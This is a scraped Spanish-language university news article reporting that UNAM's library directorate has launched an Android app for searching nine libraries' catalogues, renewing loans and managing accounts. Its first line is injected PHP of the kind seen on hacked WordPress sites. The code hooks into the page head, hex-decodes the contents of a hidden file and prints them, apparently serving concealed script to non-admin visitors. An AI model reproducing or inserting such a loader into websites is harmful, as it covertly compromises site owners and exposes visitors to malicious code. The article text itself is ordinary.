if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Ya es posible tener a las bibliotecas de la UNAM en una APP – La Opinión Universitaria La Opinión Universitaria
Menu

Ya es posible tener a las bibliotecas de la UNAM en una APP

 

 

Los estudiantes de la Universidad Nacional Autónoma de México podrán llevar, literalmente, el catálogo de nueve bibliotecas en su bolsillo, gracias a la aplicación Bibliotecas UNAM.

Desarrollada por la Dirección General de Bibliotecas (DGB), la app, ya disponible para los sistemas Android y en proceso para iOS, ofrece una novedosa forma de acceder a los recursos bibliográficos, como catálogos de libros y tesis, indicó Elsa Ramírez Leyva, titular de la DGB.

Por el momento, con esta herramienta se puede acceder al acervo de la Biblioteca Central; al de la Facultad de Economía; a tres de la Dirección General de Cómputo y de Tecnologías de Información y Comunicación (en Ciudad Universitaria, en el Centro Mascarones y en Monterrey); y a la Biblioteca Conjunta de Ciencias de la Tierra (que incluye cuatro recintos), que ofrecen un catálogo de más de un millón de registros bibliográficos. El resto de las bibliotecas se irá incorporando.

Cada día, los usuarios del Sistema Bibliotecario y de Información de la UNAM (SIBIUNAM) demandan servicios de información de punta, y con esta aplicación optimizarán su búsqueda, enfatizó.

Miguel Ángel Jiménez Bernal, subdirector de Informática de la DGB, comentó que la aplicación puede ser usada por académicos y alumnos de esta casa de estudios, y por el público en general. “Ha sido un trabajo arduo que llevó cerca de nueve meses debido a la complejidad del sistema”.

Al ofrecer servicios de búsqueda, consulta, autopréstamo, renovación en línea, registro de usuarios y recuperación de contraseñas, se espera potenciar el uso de los recursos informativos de la Universidad.

“Esto permitirá incentivar la consulta de colecciones impresas mediante préstamos a domicilio. Todo está sincronizado con el sistema de bibliotecas para que el usuario busque libros y pueda llevárselos a su hogar”, concluyó.

  • No comments

    Deja una respuesta

    Tweets recientes